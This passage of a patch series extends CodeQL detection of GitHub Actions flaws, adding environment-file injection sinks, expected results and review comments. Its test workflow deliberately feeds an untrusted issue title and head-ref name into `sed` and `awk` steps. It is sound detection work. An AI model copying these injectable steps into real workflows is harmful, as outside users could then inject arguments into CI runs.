@@ -935,8 +944,11 @@ cfgNodes | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -1047,7 +1059,7 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | 
@@ -1108,8 +1120,11 @@ dfNodes | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | 
@@ -1222,7 +1237,7 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:41:23 | .github/workflows/poisonable_steps.yml@5:5:41:23 | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | 
@@ -1283,8 +1298,11 @@ nodeLocations | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:9:41:23 | .github/workflows/poisonable_steps.yml@41:9:41:23 | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | +| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | +| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | 
.github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -1306,7 +1324,7 @@ scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 3f2f30a78a0..09e540a0f1b 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -17,6 +17,14 @@ jobs: - run: awk "BEGIN {$TITLE}" - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json - run: | - # We consider | as a shell pipe so this one is not reported yet until - # we can better identify all the commands in a shell script sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json + - run: | + sed -e 's##${TITLE}#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##TITLE#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky + - run: | + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky 
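Review bot: Both added `sed -e` steps keep `${TITLE}` inside single-quoted scripts, where the shell performs no expansion, yet the updated ArgumentInjection expectations report a flow from `github.event.issue.title` into the steps at lines 21 and 26 of the fixture. If flagging regardless of quoting is intended, record it in the fixture with a comment such as `# single-quoted on purpose: reported although the shell will not expand ${TITLE}`; if not, a double-quoted variant would cover the case that is actually reachable. The hunk also removes the comment on the `|`-delimited `sed -i` step without a replacement, so a short comment per step naming what it exercises (`|` delimiter, `${TITLE}` in the first versus the last `-e`) would keep the fixture readable. The `env:` block that defines TITLE is outside the hunk, so its mapping to the issue title is inferred from the expected output.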
diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index b5d25bf0d13..b5df9a2cbd3 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -3,6 +3,8 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | 
@@ -10,6 +12,9 @@ nodes | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | 
@@ -17,3 +22,6 @@ subpaths | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. 
| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index dfbf87174cc..73413f51a39 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected 
@@ -3,6 +3,8 @@ edges | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | 
@@ -10,5 +12,8 @@ nodes | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | +| .github/workflows/arg_injection.yml:19:14:20:84 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:21:14:25:111 | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:26:14:30:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | subpaths #select From 90efdc7deb85f3074f595dd4985ca7000d5820dc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 12:47:16 +0200 Subject: [PATCH 0447/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 3a09bb01674..1c4415a305d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.30 +version: 0.1.31 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b89b197da04..9b49717942b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.30 +version: 0.1.31 groups: [actions, queries] suites: codeql-suites extractor: javascript From 8cf1a6afa7755cedad993fec7d9957023abda72f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 15:48:57 +0200 Subject: [PATCH 0448/1267] feat(bash): Add support for `cat hazelcast/.github/java-config.env >> $GITHUB_ENV` --- ql/lib/codeql/actions/Helper.qll | 26 ++++++++ .../security/EnvPathInjectionQuery.qll | 43 ++++++++----- .../actions/security/EnvVarInjectionQuery.qll | 48 ++++++++++----- .../security/OutputClobberingQuery.qll | 60 ++++++++++++------- .../CWE-077/.github/workflows/test10.yml | 28 +++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 4 ++ .../CWE-077/EnvVarInjectionMedium.expected | 3 + 7 files changed, 158 insertions(+), 54 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test10.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index f177c645dbd..2953817de6b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll 
@@ -212,6 +212,32 @@ predicate writeToGitHubPath(Run run, string content) { extractFileWrite(run.getScript(), "GITHUB_PATH", content) } +/** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ +bindingset[script, file_var] +predicate fileToFileWrite(string script, string file_var, string path) { + exists(string regexp, string line, string file_expr | + isBashParameterExpansion(file_expr, file_var, _, _) and + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + line = script.splitAt("\n") and + path = line.regexpCapture(regexp, 2) and + file_expr = trimQuotes(line.regexpCapture(regexp, 5)) + ) +} + +predicate fileToGitHubEnv(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_ENV", path) +} + +predicate fileToGitHubOutput(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_OUTPUT", path) +} + +predicate fileToGitHubPath(Run run, string path) { + fileToFileWrite(run.getScript(), "GITHUB_PATH", path) +} + predicate inPrivilegedCompositeAction(AstNode node) { exists(CompositeAction a | a = node.getEnclosingCompositeAction() and diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index fc45b8c041d..40c0c7da9eb 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources 
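Review bot: In `fileToFileWrite` the pattern opens with `(cat)\\s*`, so whitespace after the command name is optional and any line that merely begins with the letters `cat` (a script named `catalog.sh` redirected to `$GITHUB_ENV`, for example) is reported as a file copy; `(cat)\\s+` would require a real `cat` invocation. As far as I know `regexpCapture` has to match the whole line rather than a substring, so the same pattern would also miss an indented `cat` inside an `if` body, a `sudo cat …` and a line that continues after the target (`… >> $GITHUB_ENV && next`); a leading `\\s*` and a looser tail look worth adding together with fixtures. The wrappers `fileToGitHubEnv`, `fileToGitHubOutput` and `fileToGitHubPath` have no QLDoc, and a line such as `/** Holds if the script of run copies the file at path into $GITHUB_ENV. */` on each would match the comment already present on `fileToFileWrite`.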
@@ -16,27 +17,39 @@ abstract class EnvPathInjectionSink extends DataFlow::Node { } */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubPath(run, value) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.env >> $GITHUB_PATH + fileToGitHubPath(run, _) + or + exists(string value | + writeToGitHubPath(run, value) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_PATH + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 + ) + ) ) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index f7a9283f800..4f54f38f274 100644 
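Review bot: The new `fileToGitHubPath(run, _)` branch discards the captured path, so once a Run step follows an `UntrustedArtifactDownloadStep` or a `PRHeadCheckoutStep`, every `cat <file> >> $GITHUB_PATH` in it becomes a sink, including a file that the download or checkout never wrote. The same wildcard is used for `fileToGitHubEnv(run, _)` in `EnvVarInjectionFromFileReadSink` and for `fileToGitHubOutput(run, _)` in `OutputClobberingFromFileReadSink`. Until the path can be compared with the directory the step writes to, a comment on the branch such as `// TODO: require path to be under the directory written by step` would record the known over-approximation. This commit adds the `cat … >> $GITHUB_ENV` and `cat … >> $GITHUB_OUTPUT` examples to the QLDoc of the other two classes but does not add the `$GITHUB_PATH` one to this class; the start of the class comment is outside the hunk.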
--- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -2,6 +2,7 @@ private import actions private import codeql.actions.TaintTracking private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.dataflow.FlowSteps import codeql.actions.DataFlow import codeql.actions.dataflow.FlowSources 
@@ -12,33 +13,48 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } * Holds if a Run step declares an environment variable with contents from a local file. * e.g. * run: | + * cat test-results/.env >> $GITHUB_ENV * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV * echo "sha=$(> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { - exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | + exists(Run run, Step step | + ( + step instanceof UntrustedArtifactDownloadStep or + step instanceof PRHeadCheckoutStep + ) and this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and - writeToGitHubEnv(run, content) and - extractVariableAndValue(content, _, value) and ( - outputsPartialFileContent(value) - or // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var_name, string var_value | - run.getScript().splitAt("\n") = line - | - var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - outputsPartialFileContent(var_value) and + // cat test-results/.env >> $GITHUB_ENV + fileToGitHubEnv(run, _) + or + exists(string content, string value | + writeToGitHubEnv(run, content) and + extractVariableAndValue(content, _, value) and ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + // e.g. + // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV + outputsPartialFileContent(value) or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - 